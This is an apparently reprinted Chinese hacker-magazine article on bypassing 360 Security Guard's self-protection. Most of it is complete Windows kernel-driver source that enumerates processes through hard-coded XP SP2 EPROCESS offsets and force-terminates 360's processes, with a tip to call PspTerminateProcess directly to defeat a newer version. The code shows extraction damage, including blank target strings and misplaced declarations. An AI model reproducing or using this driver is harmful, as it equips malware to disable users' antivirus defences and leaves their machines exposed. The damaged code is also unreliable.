Ring0突破360自我保护

2024年3月26日发(作者：)

Ring0突破360自我保护

ConTrail

看了第七期的《AU3干掉360实时保护》，很佩服作者的思路，使用AU3来结束360。文章

写得很精彩，但是美中不足的是没有考虑到360的自我保护，可能是作者写文章的时候360

还没有增加自我保护这个功能。

对于开了自我保护的360来说，无论是通过任务管理器，还是taskkill、ntsd命令都无法结

束其进程。360的自我保护刚出来的时候还是大肆宣传了一番，说是完全可以媲美KV2008，

因此我想开了这个功能的人应该不少吧。

OK，废话不多说，现在我们就来想办法，彻底突破360的自我保护。

看到进程保护，首先想到的就是Hook。记得Flowercode大牛曾经说过，360 安全卫士的自

我保护方法是在 KiSystemService Hook 中过滤了一些函数，比如 ZwOpenProcess，用于阻

止用户态程序结束其进程；对于使用驱动的进程管理类程序则是过滤了

ZwDeviceIoControlFile函数的参数，若发现受到保护的 PID/EPROCESS 则进行干扰。因为

这类程序通常都是使用明文传递DeviceIoControlCode给驱动，被360一干扰，自然不能结

束进程了。

知道了原理，自然就好办了。

第一种是采用密文的方式来传递DeviceIoControlCode，简单一点采用异或加密就可以。但

是这种需要ring3得到PID传给ring0，我更喜欢Do All Things In Ring0。所以采用第二种方

法，标准的PsLookupProcessByProcessId -> KeStackAttachProcess -> ZwTerminateProcess ->

KeUnStackAttachProcess,所有的流程都在驱动中完成，不使用DeviceIoControlCode。废话不

多说，直接上代码。

先摘录一些XPSP2环境中EPROCESS的定义片断和其他的一些数据结构的定义 ：

dt _EPROCESS

+0x000 Pcb : _KPROCESS

+0x078 ExitTime : _LARGE_INTEGER

+0x174 ImageFileName : [16] UChar

+0x1f4 SeAuditProcessCreationInfo : _SE_AUDIT_PROCESS_CREATION_INFO

dt _SE_AUDIT_PROCESS_CREATION_INFO

+0x000 ImageFileName : Ptr32 _OBJECT_NAME_INFORMATION

dt _OBJECT_NAME_INFORMATION

+0x000 Name : _UNICODE_STRING

#include

NTSTATUS status;

PEPROCESS eprocess = NULL;

UNICODE_STRING path;

WCHAR path_buffer[256];

WCHAR buffer[256];

int index;

unsigned char* p;

unsigned char* pExtiTime;

KAPC_STATE apcstate;

//申明要使用的API

NTKERNELAPI

NTSTATUS

PsLookupProcessByProcessId (

IN ULONG ProcessId,

OUT PEPROCESS *Process

);

NTKERNELAPI

VOID

KeStackAttachProcess (

IN PRKPROCESS PROCESS,

OUT PRKAPC_STATE ApcState

);

NTKERNELAPI

VOID

KeUnstackDetachProcess (

IN PRKAPC_STATE ApcState

);

NTSTATUS

NTAPI

ZwTerminateProcess(

IN HANDLE ProcessHandle OPTIONAL,

IN NTSTATUS ExitStatus);

void DriverUnload(PDRIVER_OBJECT DriverObject)

{

DbgPrint("Drv unLoading!n");

return ;

}

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,

RegistryPath)

{

DbgPrint("Drv Loading!n");

PUNICODE_STRING

DriverObject->DriverUnload = DriverUnload;

RtlInitEmptyUnicodeString(&path,path_buffer,sizeof(path_buffer)); //初始化字符串

for (index = 12; index < 65535; index += 4) //从12开始使用PsLookupProcessByProcessId

//获得EPROCESS，相当于Enum了

//PspCidTable，我们平时用的PspCidTable地

//址也是从这个函数中搜索特征码搜出来的

{

status = PsLookupProcessByProcessId( index,&eprocess );

if (NT_SUCCESS(status)) //PID有效

{

pExtiTime = (unsigned char*)eprocess;

pExtiTime = pExtiTime+0x78; //进程的ExitTime

if ( *pExtiTime == 0 ) //ExitTime等于0表示该进程正在运行

{

p = (unsigned char*)eprocess;

p = p+0x1f4; //SeAuditProcessCreationInfo,2000下没有此项

//不使用偏移0x174的ImageFileName而是使用

// SeAuditProcessCreationInfo是因为ImageFileName长度只有

//16，路径稍微长一点就取不完整

_asm

{

push eax

mov eax,DWORD PTR[p] //OBJECT_NAME_INFORMATION

mov eax,DWORD PTR[eax] //UNICODE_STRING

mov p,eax

pop eax

}

RtlCopyUnicodeString(&path,(PUNICODE_STRING)p); //这句其实可以去掉，

//写上只是为了好调试

RtlCopyMemory(buffer,(unsigned char*)(p+8),mLength); //将文件路

径拷贝出来

if ( wcsstr(buffer,L"") || wcsstr(buffer,L"") ||

wcsstr(buffer,L"") || wcsstr(buffer,L"")) //判断是否为360的进程，是

则杀之o(∩_∩)o...

{

DbgPrint("Find 360!");

DbgPrint("EPROCESS is:%08xn",eprocess);

DbgPrint("%wsn",buffer); //打印路径

KeStackAttachProcess((PRKPROCESS)eprocess,&apcstate);//切换进程空间

status = ZwTerminateProcess(0,0); //结束进程

if (NT_SUCCESS(status))

DbgPrint("ZwTerminateProcess OK!");

KeUnstackDetachProcess(&apcstate);

DbgPrint("Fuck 360!");

}

else

{

}

}

else

{

//DbgPrint("Exited Process!n");

}

}

}

return STATUS_SUCCESS;

}

这份代码是我在5月份的时候写的，可以结束掉2.0版本的360保险箱。因为360保险箱只

支持XPSP2系统，所以驱动中用到的EPROCESS之类的数据结构我都是采用硬编码。但是

今天在写这篇文章的时候才发现360保险箱出了2.2beta版，用我原来这个驱动已经无法结

束了，于是赶紧WinDbg了一阵，发现原来是过滤了ZwTerminateProcess。改了一下代码，

不是KeStackAttachProcess -> ZwTerminateProcess而是直接调用PspTerminateProcess来结束，

果然可以顺利结束。源代码就不占黑防宝贵的版面了，我放在附件里。如果有什么问题，欢

迎大家到黑防论坛里指出。